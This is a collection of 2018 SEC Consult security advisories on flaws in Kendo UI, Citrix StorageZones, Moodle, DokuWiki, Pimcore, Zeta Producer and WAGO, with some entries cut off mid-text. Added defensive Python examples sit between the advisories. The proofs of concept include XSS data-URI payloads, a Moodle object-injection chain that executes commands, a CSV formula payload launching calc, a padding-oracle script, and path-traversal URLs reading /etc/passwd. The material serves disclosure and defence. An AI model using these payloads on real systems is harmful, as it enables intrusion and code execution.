> The following, incomplete list, of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
>
>
> data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">
>
> HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
>
>
>
> After a click on the button the setValue function on line 513 of the
> beautified "api.js" is called:
>
> var setValue = function () {
>     editor.value($("#value").val());
> };
>
>
> The value function is implemented in line 64383 of the beautified
> "kendo.all.js" file and defined as:
>
> value: function (html) {
>     var body = this.body, editorNS = kendo.ui.editor, options =
>         this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
>         options.serialization);
>     if (html === undefined) {
>         return currentHtml;
>     }
>     if (html == currentHtml) {
>         return;
>     }
>     editorNS.Serializer.htmlToDom(html, body,
>         options.deserialization);
>     this.selectionRestorePoint = null;
>     this.update();
>     this.toolbar.refreshTools();
> },
>
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
>
> var Serializer = {
>     toEditableHtml: function (html) {
>         return (html || '').replace(//g,
>             '').replace(/<(\/?)script([^>]*)>/gi,
>             '<$1k:script$2>').replace(/]*)>/gi, function (match) {
>                 return match.replace(onerrorRe, '');
>             }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
>             '$1').replace(/^<(table|blockquote)/i, br +
>             '<$1').replace(/^[\s]*(|\u00a0)/i,
>             '$1').replace(/<\/(table|blockquote)>$/i,
>             '' + br);
>     },
>
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data uri payload. The payload is
> added unescaped to the editor DOM after several other functions calls.
>
>
> Vulnerable / tested versions:
> -
> The following version has been identified to be vulnerable:
> * v2018.1.221
>
>
> Vendor contact timeline:
>
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered through unencrypted email to vendor
> 2018-05-29: Contacting vendor for curren
SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
vulnerable version: all versions before 5.4.2
fixed version: 5.4.2
CVE number: CVE-2018-16968, CVE-2018-16969
impact: Medium
homepage: https://www.citrix.com/
found: 2018-08
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely exchange documents. ShareFile Enterprise provides enterprise-class service and includes StorageZones Controller and the User Management Tool. ShareFile StorageZones Controller extends the ShareFile software as a service (SaaS) cloud storage by providing your ShareFile account with private data storage, referred to as StorageZones for ShareFile Data. [...]."
URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html

Business recommendation:
Users of this product are advised to install the security patch provided by Citrix. The vulnerabilities identified suggest that no sufficient technical security audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult recommends that Citrix conduct such an audit.

Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only available to the internal network (e.g. CIFS Windows shares) to clients connecting from the Internet. In order to hide internal network paths from the user and to only allow access to paths specifically allowed by the administrator, internal network paths are encrypted. E.g. if an administrator wants to allow access to a UNC path (e.g. \\testhost\testshare\testdir), this string is encrypted and provided to the client. When the user calls the API to e.g. list the contents of this directory, the StorageZones Controller returns the encrypted absolute paths for each directory entry. This way, the absolute internal paths are always hidden from the user.

1) Improper Access Restrictions
Citrix StorageZones Controller offers users a functionality to convert UNC paths into their encrypted form. Therefore, users are able to access any UNC paths accessible by the StorageZones Controller. When providing access to a network share, the StorageZones Controller impersonates the user. Therefore, unauthorized access to network shares is not possible. However, Citrix StorageZones Controller internally does not distinguish between UNC paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows). Therefore, users may access (e.g. read, write, delete) local paths for which they have appropriate NTFS permissions.

Note: Citrix StorageZones allows an administrator to define the paths exposed by the StorageZones Controller. By configuring this setting an administrator can restrict access to network paths only. The configuration page incorrectly states that a value of "*" (the default value) "allows connections to all hosts on the internal network", while in fact it also allows access to local paths.

2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is vulnerable to a padding oracle attack. This allows an attacker to partly decrypt or potentially modify internal paths.

3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the preconditions to exploit vulnerability #1 are met. In practice this vulnerability has a similar effect as vulnerability #1.

Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:
https:///cifs/v3/Items/ByPath?path=c:\

The following URL demonstrates how e.g. the contents of the directory can be listed:
https:///cifs/v3/Items()?$expand=Children

2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be decrypted. It may also be possible to partly modify encrypted paths (this has not been verified).

snip
    import sys
    sys.path.append('python-paddingoracle')
    from paddingoracle import BadPaddingException, PaddingOracle, xor
    from base64 import b64encode, b64decode
    from urllib import quote, unquote
    import requests
    import socket
    import time
    import getpass

    URL = 'http:///'
    AUTH = (raw_input('User: '), getpass.getpass('Password: '))
    CIPHER = ''

    class PadBuster(PaddingOracle):
        def __init__(self, **kwargs):
            super(PadBuster, self).__i
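A path check of the kind vulnerability #1 calls for, as an added example that is not Citrix code: only \\host\share paths are accepted, local drive and device paths are rejected outright, traversal segments are refused, and the host is compared against an allow-list whose "*" value mirrors the setting described above. Function names, the allow-list format and its semantics are assumptions.

```python
"""Added example (not Citrix code): accept only UNC paths to allow-listed
hosts, never local drive or device paths.  All names are assumptions."""
import re

# \\host\share followed by zero or more \segment parts.  Characters that are
# invalid in Windows path components are excluded from every component, so
# "\\?\C:\..." (extended-length prefix) never matches at all.
_UNC_RE = re.compile(
    r'^\\\\([^\\/:*?"<>|]+)\\([^\\/:*?"<>|]+)((?:\\[^\\/:*?"<>|]*)*)$'
)
# "\\.\..." looks like UNC syntax but addresses local devices.
_LOCAL_PSEUDO_HOSTS = {".", "?"}


def validate_share_path(path, allowed_hosts):
    """Return the canonical \\host\share\... form of path, or raise ValueError.

    allowed_hosts models the StorageZones setting from the advisory: "*"
    permits any host, but a local path is never accepted (assumed semantics).
    """
    candidate = path.replace("/", "\\")        # Windows accepts either separator
    match = _UNC_RE.match(candidate)
    if match is None:                          # C:\..., c:\, relative paths, \\?\...
        raise ValueError("not a \\\\host\\share path: %r" % (path,))
    host, share, rest = match.groups()
    if host in _LOCAL_PSEUDO_HOSTS:
        raise ValueError("device path rejected: %r" % (path,))

    segments = rest.split("\\")[1:] if rest else []
    if segments and segments[-1] == "":        # tolerate one trailing separator
        segments.pop()
    for segment in segments:
        if segment in ("", ".", ".."):         # empty, "." and ".." = traversal
            raise ValueError("traversal or empty segment in %r" % (path,))

    allowed = {h.lower() for h in allowed_hosts}
    if "*" not in allowed and host.lower() not in allowed:
        raise ValueError("host %r is not allow-listed" % (host,))
    return "\\\\%s\\%s%s" % (host, share, "".join("\\" + s for s in segments))


def is_allowed_share_path(path, allowed_hosts):
    """True if validate_share_path accepts the path, False otherwise."""
    try:
        validate_share_path(path, allowed_hosts)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs: the advisory's example share, its "c:\" PoC path,
    # and a few variants a client might send.
    for p in (r"\\testhost\testshare\testdir", "c:\\", r"C:\Windows",
              r"\\?\C:\Windows", r"\\testhost\testshare\..\other"):
        print("%-35s %s" % (p, is_allowed_share_path(p, ["testhost"])))
```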
SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions
fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
CVE number: CVE-2018-14630
impact: critical
homepage: https://moodle.org/
found: 2018-07-08
by: Johannes Moritz (Office Berlin)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Powering tens of thousands of learning environments globally, Moodle is trusted by institutions and organisations large and small, including Shell, London School of Economics, State University of New York, Microsoft and the Open University. Moodle’s worldwide numbers of more than 90 million users across both academic and enterprise level usage makes it the world’s most widely used learning platform."
Source: https://moodle.org/about

Business recommendation:
The vendor provides a patch which should be installed immediately. SEC Consult recommends performing a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy Moodle XML format, the passed feedback answer is used unsanitized in an unserialize() call, which leads to a PHP Object Injection vulnerability. By providing a sophisticated PHP object chain it is possible to leverage the POI into fully-blown arbitrary Remote Code Execution (RCE).
To exploit this vulnerability an attacker needs permissions to create a quiz or at least be able to import questions. A user with the role teacher usually has these permissions. However, students can also be assigned the role teacher for a specific course.

Proof of concept:
-
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
In order to exploit this issue an attacker has to open Moodle's question bank for a specific course and import the following Moodle XML file. The answer feedback contains a sophisticated PHP object chain which only contains objects from Moodle's library. After the parsing process the command "echo `whoami`" is executed.

    question name
    O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2:{s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;}

Vulnerable / tested versions:
-
The following version has been tested, which was the most recent one at the time of the test:
* 3.5.1+

According to the vendor, all previous versions are affected as well:
* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions

Vendor contact timeline:
2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie from RIPS Technologies)
2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] created)
2018-07-09: Vendor replied and supplied a fix for the vulnerability
2018-09-10: Vendor releases patched version
2018-09-18: Public release of security advisory

Solution:
-
The vendor provides a patched version (3.5.2) which should be installed immediately:
https://download.moodle.org/releases/latest/

The vendor also provided a security advisory regarding this issue:
https://moodle.org/mod/forum/discuss.php?d=376023#p1516118

Workaround:
---
Disable import of ddwtos questions through XML files.

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | A
SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
title: CSV Formula Injection
product: DokuWiki
vulnerable version: 2018-04-22a "Greebo" and older versions
fixed version: None
CVE number: CVE-2018-15474
impact: Medium
homepage: https://www.dokuwiki.org
found: 2018-07-09
by: Jean-Benjamin Rousseau (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software that doesn't require a database. It is loved by users for its clean and readable syntax. The ease of maintenance, backup and integration makes it an administrator's favorite. Built in access controls and authentication connectors make DokuWiki especially useful in the enterprise context and the large number of plugins contributed by its vibrant community allow for a broad range of use cases beyond a traditional wiki."
Source: https://www.dokuwiki.org/dokuwiki

Business recommendation:
The issue will not be fixed according to the vendor. Users are advised to be careful when opening files obtained via the CSV export functionality. SEC Consult recommends performing a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that, when exported and opened with a spreadsheet application (Microsoft Excel, Open Office, etc.), will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk.
Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim can be the result. The final impact depends on the spreadsheet software used on the client of the victim.

Proof of concept:
-
1) CSV Formula Injection vulnerability
Registration URL: http://www.example.com/doku.php?id=start&do=register

When the registration request is submitted, the following parameters are sent in a POST request:
sectok=[...]&do=register&save=1&login=login_parameter&fullname=evil_csv_formula_injection_payload&email=email_address

The "fullname" parameter is sanitized neither before being stored nor during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example:
=cmd|'/C calc'!A0

As soon as the file gets opened in Microsoft Excel, the program calc.exe is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source.

Vulnerable / tested versions:
-
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz

Also found to be vulnerable:
2017-02-19 stable release
2016-06-26 stable release
2015-08-10 stable release
2014-09-29 stable release
2014-05-05 stable release
2013-12-08 stable release

Vendor contact timeline:
2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory

Solution:
-
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive te
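The export-side fix that the vendor declined to ship, as an added example that is not DokuWiki's code: every exported cell a spreadsheet would evaluate is prefixed with an apostrophe, and a second function scans an already exported file for such cells so an administrator can inspect it before opening it in Excel. Function names, the column layout and the sample users are assumptions; the payload in the sample is the one quoted in the advisory.

```python
"""Added example (not DokuWiki code): neutralise spreadsheet formula
triggers in a CSV user export and scan an export for risky cells.
Function names, column layout and sample users are assumptions."""
import csv
import io

# Leading characters that Excel / LibreOffice may treat as a formula start.
# Spreadsheets skip leading spaces, so they are skipped here as well.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(cell):
    """True if a spreadsheet would interpret the cell content as a formula."""
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def csv_safe_cell(value):
    """Prefix a formula-looking cell with an apostrophe so it is shown as text.

    The apostrophe stays visible in some applications and also hits harmless
    values such as "-Bob-" or "+43 ..."; that is the price of a safe export.
    """
    cell = "" if value is None else str(value)
    return "'" + cell if looks_like_formula(cell) else cell


def export_users_csv(users):
    """Render (user, real name, mail, groups) rows as CSV with every cell
    neutralised and fully quoted, as a hardened "CSV export of users" would."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["user", "name", "mail", "groups"])
    for row in users:
        writer.writerow([csv_safe_cell(cell) for cell in row])
    return buf.getvalue()


def risky_cells(csv_text):
    """List (row, column, content) of cells that look like formulas, for
    checking an existing export before it is opened in a spreadsheet."""
    hits = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            if looks_like_formula(cell):
                hits.append((row_no, col_no, cell))
    return hits


# Constructed sample users: the second "real name" is the DDE payload quoted
# in the advisory, the third is a harmless name that merely starts with a dash.
SAMPLE_USERS = [
    ("alice", "Alice Example", "alice@example.com", "admin,user"),
    ("mallory", "=cmd|'/C calc'!A0", "mallory@example.com", "user"),
    ("bob", "-Bob-", "bob@example.com", "user"),
]

if __name__ == "__main__":
    print(export_users_csv(SAMPLE_USERS), end="")
    # Constructed raw export, as the unpatched feature would write it.
    unsafe = '"user","name"\n"mallory","=cmd|\'/C calc\'!A0"\n'
    print(risky_cells(unsafe))
```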
SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
vulnerable version: 5.2.3 and below
fixed version: 5.3.0
CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
impact: High
homepage: https://pimcore.com/en
found: 2018-06-11
by: T. Silpavarangkura (Office Bangkok)
    N. Rai-Ngoen (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for master data management (PIM/MDM), user experience management (CMS/UX), digital asset management (DAM) and eCommerce."
Source: https://pimcore.com/en

Business recommendation:
The vendor provides a patch for most identified issues, but the XSS will not be fixed according to the vendor. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web service API. An attacker who obtains a valid API key that is granted the necessary permission could successfully perform an attack to extract information from the database.

2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified across multiple functions in the application, which allow an authenticated attacker to insert arbitrary JavaScript code in virtually all text fields and data entries in the application.

3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing anti-CSRF token, which allows an attacker to perform a cross-site request forgery attack to at least add, update or delete entries, among other actions.

Proof of concept:
-
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]=
http:///webservice/rest/asset-inquire?apikey=[...]=
http:///webservice/rest/asset-list?apikey=[...]=
http:///webservice/rest/document-count?apikey=[...]=
http:///webservice/rest/document-inquire?apikey=[...]=
http:///webservice/rest/document-list?apikey=[...]=
http:///webservice/rest/object-count?apikey=[...]=
http:///webservice/rest/object-inquire?apikey=[...]=
http:///webservice/rest/object-list?apikey=[...]=

Note that a valid API key that is granted at least the "Assets", "Documents" or "Objects" permission is required to perform an SQL injection attack against the associated API endpoints successfully.

2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application are vulnerable to cross-site scripting, which can be exploited by an authenticated attacker. For example, the attacker could insert an attack payload while performing at least the following actions:
1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/Field-Collections/Objectbrick/Classification Store item.

The vendor stated that many identified XSS issues only affect administrative functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges required) - so this isn't used by non-trusted users - a check just adds additional overhead without any benefits for security."
SEC Consult argued multiple times that XSS can still be exploited, e.g. when a higher privileged user gets attacked, and that the issues should be fixed nevertheless.

3. Cross-site Request Forgery (CVE-2018-14057)
The existing anti-CSRF token in the HTTP request header named "X-pimcore-csrf-token" was found to be validated only in the "Settings > Users / Roles" function. Therefore, an attacker could perform a cross-site request forgery attack against virtually all other functions in order to at least add, update and delete data without having to submit the anti-CSRF token. A non-exhaustive list of affected requests is given below:
POST /admin/asset/add-asset
POST /admin/asset/add-asset-compatibility
GET /admin/asset/delete
GET /admin/asset/import-server
GET /admin
SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows, you can create and manage your website locally, on your computer. Get your own homepage in 3 steps without expertise: select design, paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html

Business recommendation:
The vendor provides a patched version which should be installed immediately. Users of the product also need to verify that the affected widgets are updated in the corresponding website project! It could be necessary to rebuild the whole project or copy the new widgets to the website projects. For further information consult the vendor.
Furthermore, an in-depth security analysis is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files to the server. If the user uploads a PHP script with a .php extension, the server renames it to .phps to prevent PHP code execution. However, the attacker can upload .php5 or .phtml files to the server without any restriction, and these alternative file extensions can be executed as PHP code. Furthermore, the server creates a folder to store the files, with a random name generated by PHP's "uniqid" function. Unfortunately, if the server permits directory listing, the attacker can easily browse to the uploaded PHP script.
If directory listing is disabled, the attacker can still brute-force the folder name and reach the uploaded PHP script, because a uniqid() value is a timestamp with a small search space rather than a random string. Testing on a local server, it took about 20 seconds to brute-force the name. The attack is slower over the Internet but still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, they are vulnerable as well, because the client starts a web server listening on TCP port 9153.
The root cause is in the widget "formmailer", which is enabled by default. The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php

2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" in Zeta Producer Desktop CMS, an unauthenticated attacker can read local files by exploiting path traversal issues. The following file is affected:
- /assets/php/filebrowser/filebrowser.main.php

Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) is uploaded automatically:
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

2) Local File Disclosure (CVE-2018-13980)
The parameter "file" of the "filebrowser.main.php" script can be exploited to read arbitrary files from the OS with the privileges of the web server user. Any unauthenticated user can exploit this issue!
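Why the "random" upload folder is enumerable, as an added example (this is not the removed PoC and not Zeta Producer code): PHP's uniqid() without the more_entropy flag is sprintf("%08x%05x", seconds, microseconds), so the 13 hex digits are a clock reading. The PoC output above prints two uniqid values and the number 10812, which is exactly their numeric distance, so the folder name was found among at most that many candidates. How the PoC obtained the two bracketing values is not stated on the page; the three values below are copied from its output, and the candidate walk and the replacement name generator are this example's own code.

```python
"""uniqid()-named directories: decode, enumerate, and what to use instead."""
import secrets
from datetime import datetime, timezone

BEFORE = "5a1a5bc991afe"   # first uniqid value printed by the advisory's PoC
AFTER = "5a1a5bc99453a"    # second uniqid value printed by the PoC
FOUND = "5a1a5bc992772"    # suffix of the upload_<id> directory the PoC located


def php_uniqid(seconds: int, micros: int) -> str:
    """Reproduce PHP's uniqid() encoding: sprintf("%08x%05x", sec, usec)."""
    if not 0 <= micros < 1_000_000:
        raise ValueError("microseconds out of range")
    return f"{seconds:08x}{micros:05x}"


def parse_uniqid(value: str) -> tuple:
    """Inverse of php_uniqid(): split the 13 hex digits into (seconds, microseconds)."""
    if len(value) != 13:
        raise ValueError("uniqid() without more_entropy is always 13 hex digits")
    return int(value[:8], 16), int(value[8:], 16)


def candidates_between(lo: str, hi: str) -> list:
    """Every uniqid() value a clock produces from lo (inclusive) up to hi (exclusive).

    Both halves are counters, so the walk steps one microsecond at a time and
    rolls the seconds field over at 1_000_000 (0xF4240), not at 0xFFFFF.
    """
    sec, usec = parse_uniqid(lo)
    end = parse_uniqid(hi)
    out = []
    while (sec, usec) < end:
        out.append(php_uniqid(sec, usec))
        usec += 1
        if usec == 1_000_000:
            sec, usec = sec + 1, 0
    return out


def creation_time(value: str) -> datetime:
    """A uniqid() name also leaks when the directory was created, to the microsecond."""
    sec, usec = parse_uniqid(value)
    return datetime.fromtimestamp(sec, tz=timezone.utc).replace(microsecond=usec)


def random_dir_name(nbytes: int = 16) -> str:
    """Hardened replacement: a name from the OS CSPRNG carries no timestamp.

    PHP equivalent: bin2hex(random_bytes(16)). Directory listing must still be
    disabled and the upload directory kept outside the web root or served with
    script execution turned off; an unguessable name is not a substitute.
    """
    return secrets.token_hex(nbytes)
```

The candidate list for the two values from the PoC output has 10812 entries and contains the suffix the PoC found, which is the whole point: a 13-character "random" name with a known time window is a few thousand HTTP requests, not 16^13.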
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list

Vulnerable / tested versions:
-
The following versions have been tested, which were the latest versions available at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/

Vendor contact timeline:
2017-11-29: Contacting vendor through i...@zeta-producer.com and various other email addresses from the website. No reply.
2017-12-13:
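How a "file" parameter like the one above has to be confined, as an added example that is not the widget's code: the traversal value is taken from the advisory's URLs (their trailing "=download" / "=list" is left out, since only the path resolution matters here); the base directory and the function names are assumptions for this illustration.

```python
"""Confining a user-supplied file path to a base directory."""
import posixpath
from urllib.parse import unquote

BASE = "/var/www/site/assets/userfiles"   # assumed document area of the widget

TRAVERSAL = "../../../../../../../../../../etc/passwd"   # value from the advisory URL


class PathOutsideBase(ValueError):
    pass


def resolve_unchecked(base: str, user_path: str) -> str:
    """What a naive join does: the '..' segments walk right out of ``base``."""
    return posixpath.normpath(posixpath.join(base, user_path))


def safe_resolve(base: str, user_path: str) -> str:
    """Decode once, normalise, then require the result to stay under ``base``.

    Decoding here (after the web server's own decode) means a double-encoded
    %252e%252e that arrived as %2e%2e is still caught. NUL bytes are rejected
    because C-level file APIs stop at them and would open a different name.
    On a real server, also pass the result through os.path.realpath() and
    re-check, so a symlink inside ``base`` cannot point outside it.
    """
    base = posixpath.normpath(base)
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise PathOutsideBase("NUL byte in path")
    if posixpath.isabs(decoded):
        raise PathOutsideBase("absolute paths are not accepted")
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if candidate != base and not candidate.startswith(base + "/"):
        raise PathOutsideBase(f"{user_path!r} escapes {base}")
    return candidate


def is_confined(base: str, user_path: str) -> bool:
    """True when the request would be served, False when it is rejected."""
    try:
        safe_resolve(base, user_path)
        return True
    except PathOutsideBase:
        return False
```

The unchecked join turns the advisory's value into /etc/passwd (and the second URL's value into /etc, which the "list" mode would then enumerate); the confined resolver rejects both while still accepting ordinary relative names under the base.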
SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."
Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp

Business recommendation:
HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users who access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code and break the security of this link with minimal user interaction. As a consequence, a computer used for HMI administration should not offer any way to be compromised via malicious script code. Possible measures are e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations
SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues.

Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross-site scripting vulnerabilities were identified within multiple PHP scripts of the admin interface. The JSON input sent to the device in request parameters is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session. This vulnerability is present for authenticated and unauthenticated users!

2) Stored Cross-Site Scripting (CVE-2018-12981)
